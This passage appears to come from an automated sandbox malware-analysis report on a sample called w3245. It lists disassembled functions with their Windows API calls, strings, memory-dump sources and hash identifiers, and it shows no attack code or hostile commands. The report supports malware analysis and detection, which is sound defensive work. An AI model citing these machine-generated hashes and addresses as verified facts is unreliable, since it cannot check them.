                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                              • API String ID: 3168844106-1851729331
                                                                                                                                                              • Opcode ID: f1c399e3256da60ee45ebf529665fcf5b80d5af8a5b09c701fefbf4a4512e704
                                                                                                                                                              • Instruction ID: ac2f7833e610321104953a49c047125d9ef971751a773d03eae56ff64feb6ee0
                                                                                                                                                              • Opcode Fuzzy Hash: f1c399e3256da60ee45ebf529665fcf5b80d5af8a5b09c701fefbf4a4512e704
                                                                                                                                                              • Instruction Fuzzy Hash: 14019A32904528EBCF165F88CC09F9E3B24FF10360F004128FC04AA261DB3A9E60EBD4
                                                                                                                                                              Function 007C7539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,007C9897,00000000,?,00000000,00000000,00000000,?,007C96D6,00000000,?,00000000,00000000), ref: 007C7545
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,007C9897,00000000,?,00000000,00000000,00000000,?,007C96D6,00000000,?,00000000), ref: 007C759B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get value of variable: %ls, xrefs: 007C756B
                                                                                                                                                              • Failed to copy value of variable: %ls, xrefs: 007C758A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                              • API String ID: 3168844106-2936390398
                                                                                                                                                              • Opcode ID: c94321dfc4fc9c0738c2957ef2ac546e03dbe6f5a283471cca078e6ccf83cee6
                                                                                                                                                              • Instruction ID: 098802f4a3ef46be11e330258f14d9926880781e627b45e41226f08c0de09744
                                                                                                                                                              • Opcode Fuzzy Hash: c94321dfc4fc9c0738c2957ef2ac546e03dbe6f5a283471cca078e6ccf83cee6
                                                                                                                                                              • Instruction Fuzzy Hash: 91F03176945228FBCF125F54DC09E9E7B68FF14361F008158FD14A6260C73A9E61ABD4
                                                                                                                                                              Function 007EE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007EE788
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007EE797
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 007EE7A0
                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 007EE7AD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                              • Opcode ID: 6e525f4f5dcc009ce9424a2a236df682e9da822a035f4309179150cc8ec92842
                                                                                                                                                              • Instruction ID: edde88bfb86fcd925572533e6e30258cd4f48ea85d314fa153cae579502903f4
                                                                                                                                                              • Opcode Fuzzy Hash: 6e525f4f5dcc009ce9424a2a236df682e9da822a035f4309179150cc8ec92842
                                                                                                                                                              • Instruction Fuzzy Hash: 1FF04D71C1120DEBCB04DBB4D949A9EBBF8FF18315F614895A415E7210E734AB049B61
                                                                                                                                                              Function 00800C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00800DD7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 3535843008-955085611
                                                                                                                                                              • Opcode ID: ac38fc326cbe18f9d5adb19510f7b6a9f1c07fa63f603a0d8c7d63c58b56b045
                                                                                                                                                              • Instruction ID: fddb0fc37a7f77419eaaf072dd40665c54b0a2cec84c23ab7b393f097577b774
                                                                                                                                                              • Opcode Fuzzy Hash: ac38fc326cbe18f9d5adb19510f7b6a9f1c07fa63f603a0d8c7d63c58b56b045
                                                                                                                                                              • Instruction Fuzzy Hash: BE41B032D0152AEBEBB18AD4CC04BAE7761FB10760F258365BC14EA2D0D7359E40AFA1
                                                                                                                                                              Function 0080479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008048FC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                              • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                              • API String ID: 47109696-3023217399
                                                                                                                                                              • Opcode ID: 00c9cc2f72c7150e02e615bdc4f9fc1b39d51de7909f52e05e71d8b25e3ec2f9
                                                                                                                                                              • Instruction ID: 72bb4c0029ed7d2fba6ca1d58de3122031f78c0978a116f86bc37cdecf3cf039
                                                                                                                                                              • Opcode Fuzzy Hash: 00c9cc2f72c7150e02e615bdc4f9fc1b39d51de7909f52e05e71d8b25e3ec2f9
                                                                                                                                                              • Instruction Fuzzy Hash: 37418CB5E40159EFCB60DF98CC81AAEBBB5FB44B10F1594B9EA00E7291DB319E40DB50
                                                                                                                                                              Function 008010B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 3660427363-955085611
                                                                                                                                                              • Opcode ID: d86b3986777e784a169cc478dcf3ea2226778380234deb6a7a1172d9b23f1ed9
                                                                                                                                                              • Instruction ID: 139a84241c61ad773102ac2e354c6628b83a597751f7b14212890d11d8e38bd9
                                                                                                                                                              • Opcode Fuzzy Hash: d86b3986777e784a169cc478dcf3ea2226778380234deb6a7a1172d9b23f1ed9
                                                                                                                                                              • Instruction Fuzzy Hash: EA417132D0112AFBDF259F94CC49AAEBBB9FF04760F14816DEA10E7291D7319E119B90
                                                                                                                                                              Function 007F66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0080B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 007F67A3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007F67BF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                              • String ID: comres.dll
                                                                                                                                                              • API String ID: 203985260-246242247
                                                                                                                                                              • Opcode ID: 28be490bb12d6689ecb44dbe07bf1361fa8c7482afa7cd560887f1f40f7818a1
                                                                                                                                                              • Instruction ID: dc1cb62ba719c64744a87286bf2873c2eac659a278deb9d72da2beeafacbf73e
                                                                                                                                                              • Opcode Fuzzy Hash: 28be490bb12d6689ecb44dbe07bf1361fa8c7482afa7cd560887f1f40f7818a1
                                                                                                                                                              • Instruction Fuzzy Hash: 5231F63560021DEBCB21BF65C889ABB7B68AF41764F140165FB248B391EB78CD00C7B1
                                                                                                                                                              Function 00808F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00808E44: lstrlenW.KERNEL32(00000100,?,?,?,00809217,000002C0,00000100,00000100,00000100,?,?,?,007E7D87,?,?,000001BC), ref: 00808E69
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B500,wininet.dll,?), ref: 0080907A
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B500,wininet.dll,?), ref: 00809087
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                                • Part of subcall function 00800E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8E1B), ref: 00800EAA
                                                                                                                                                                • Part of subcall function 00800E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8E1B,00000000), ref: 00800EC8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                                              • String ID: wininet.dll
                                                                                                                                                              • API String ID: 2680864210-3354682871
                                                                                                                                                              • Opcode ID: b199e057790f1fdacf2dedab462a6aa9d32ddd43359cf3e01911f0ca6ccb5acc
                                                                                                                                                              • Instruction ID: f41566b149fb768a78f7d2f3740dbf9e9ba53d7b26724c463f32415279959f9a
                                                                                                                                                              • Opcode Fuzzy Hash: b199e057790f1fdacf2dedab462a6aa9d32ddd43359cf3e01911f0ca6ccb5acc
                                                                                                                                                              • Instruction Fuzzy Hash: B9311932C0152AEFCF61AFA8CD419AEBB79FF04710F514179EA50B61A2C7314E509B91
                                                                                                                                                              Function 0080939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00808E44: lstrlenW.KERNEL32(00000100,?,?,?,00809217,000002C0,00000100,00000100,00000100,?,?,?,007E7D87,?,?,000001BC), ref: 00808E69
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00809483
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0080949D
                                                                                                                                                                • Part of subcall function 00800BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D061A,?,00000000,00020006), ref: 00800C0E
                                                                                                                                                                • Part of subcall function 008014F4: RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
                                                                                                                                                                • Part of subcall function 008014F4: RegDeleteValueW.ADVAPI32(00020006,00810D10,00000000,?,?,007CF335,00000000,?,00020006,?,00810D10,00020006,00000000,?,?,?), ref: 00801557
                                                                                                                                                                • Part of subcall function 008014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,007CF28D,00810D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008014BB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                                              • String ID: %ls\%ls
                                                                                                                                                              • API String ID: 3924016894-2125769799
                                                                                                                                                              • Opcode ID: 19b9a1f6018913027cfc03dea5f05e68e7b33a1c3b69888e19f5606b3546f556
                                                                                                                                                              • Instruction ID: 7c16d72be9f2e8d03d992db2ab00c1cbed83bd9b385300dc3cf631584d7d5834
                                                                                                                                                              • Opcode Fuzzy Hash: 19b9a1f6018913027cfc03dea5f05e68e7b33a1c3b69888e19f5606b3546f556
                                                                                                                                                              • Instruction Fuzzy Hash: 40313872C0152EBFCF629F94CC4189EBBB9FF04320B41816AF954A6262D7318E11EB95
                                                                                                                                                              Function 007C3A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memcpy_s
                                                                                                                                                              • String ID: crypt32.dll$wininet.dll
                                                                                                                                                              • API String ID: 2001391462-82500532
                                                                                                                                                              • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                              • Instruction ID: 82d6d8f60b8d5dedf09074c6f90b0ff95c2595424773ca97d58e95aec2fe0f51
                                                                                                                                                              • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                              • Instruction Fuzzy Hash: E2115171600219ABCB08DF19CD85E9FBF69EF95354B14C12EFC058B311D275EA20CAE0
                                                                                                                                                              Function 008014F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00020006,00810D10,00000000,?,?,007CF335,00000000,?,00020006,?,00810D10,00020006,00000000,?,?,?), ref: 00801557
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$Delete
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 1738766685-955085611
                                                                                                                                                              • Opcode ID: e9beeee41d1ef24f6a7cd6699862c443edf1318391bf08c00a5ab0d09cb7883c
                                                                                                                                                              • Instruction ID: 2fb3ad103f8be5d9f040993c8fa36e5ff491bcba3c891dfc26019ace7fd9f6e6
                                                                                                                                                              • Opcode Fuzzy Hash: e9beeee41d1ef24f6a7cd6699862c443edf1318391bf08c00a5ab0d09cb7883c
                                                                                                                                                              • Instruction Fuzzy Hash: A111A33795113AB7DF614A948C0DBAA7A64FB44B70F154225BE02FE1D0E731CD2097E0
                                                                                                                                                              Function 007CDDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,007E7691,00000000,IGNOREDEPENDENCIES,00000000,?,0080B518), ref: 007CDE04
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to copy the property value., xrefs: 007CDE38
                                                                                                                                                              • IGNOREDEPENDENCIES, xrefs: 007CDDBB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                              • API String ID: 1825529933-1412343224
                                                                                                                                                              • Opcode ID: 4fb2c0cea7283495e7986754da3c83255585ff8caab1a2a6df30294251a5ef63
                                                                                                                                                              • Instruction ID: 545eb2dc6d1f9a4482ec237f973e892e8751459b8fb7c338d193235ef3e987e3
                                                                                                                                                              • Opcode Fuzzy Hash: 4fb2c0cea7283495e7986754da3c83255585ff8caab1a2a6df30294251a5ef63
                                                                                                                                                              • Instruction Fuzzy Hash: 2411E332604215AFCB215FA4CC89FAA77A6AF54320F25417EEA199F291C7749C50CA80
                                                                                                                                                              Function 0080563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,007D8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0080566E
                                                                                                                                                              • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007D8E97,?), ref: 00805689
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoNamedSecuritySleep
                                                                                                                                                              • String ID: aclutil.cpp
                                                                                                                                                              • API String ID: 2352087905-2159165307
                                                                                                                                                              • Opcode ID: 1f8ed8c03d516a1782ed754ea669a1d7ba7d90a48340cb193ebc03680a6fd078
                                                                                                                                                              • Instruction ID: 37dec8ea2fd55eca4bca00761a12496079d1932b7205267762146c0fb87e5b6e
                                                                                                                                                              • Opcode Fuzzy Hash: 1f8ed8c03d516a1782ed754ea669a1d7ba7d90a48340cb193ebc03680a6fd078
                                                                                                                                                              • Instruction Fuzzy Hash: 52017C33801529BBCF229E88CD05E9F7F65FB94750F060115BD14A6260C6338D609EE0
                                                                                                                                                              Function 007C158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LCMapStringW.KERNEL32(0000007F,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?,007C2318,00000000,00000000), ref: 007C15D0
                                                                                                                                                              • GetLastError.KERNEL32(?,007C2318,00000000,00000000,?,00000200,?,008052B2,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007C15DA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastString
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 3728238275-3612885251
                                                                                                                                                              • Opcode ID: fdfcb7272cb1075535f6dbf65d681da19e58a84fc366c16a91cb3377907a98db
                                                                                                                                                              • Instruction ID: ba56b4f2c322fa6968876dfde377e5312f21198ff1c33598d1d59237b4e46b17
                                                                                                                                                              • Opcode Fuzzy Hash: fdfcb7272cb1075535f6dbf65d681da19e58a84fc366c16a91cb3377907a98db
                                                                                                                                                              • Instruction Fuzzy Hash: 1B01B533941636B7CB219E999C44F5B7B69EF86B70B45023CFE10BB252DA24DC2097E0
                                                                                                                                                              Function 007D57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
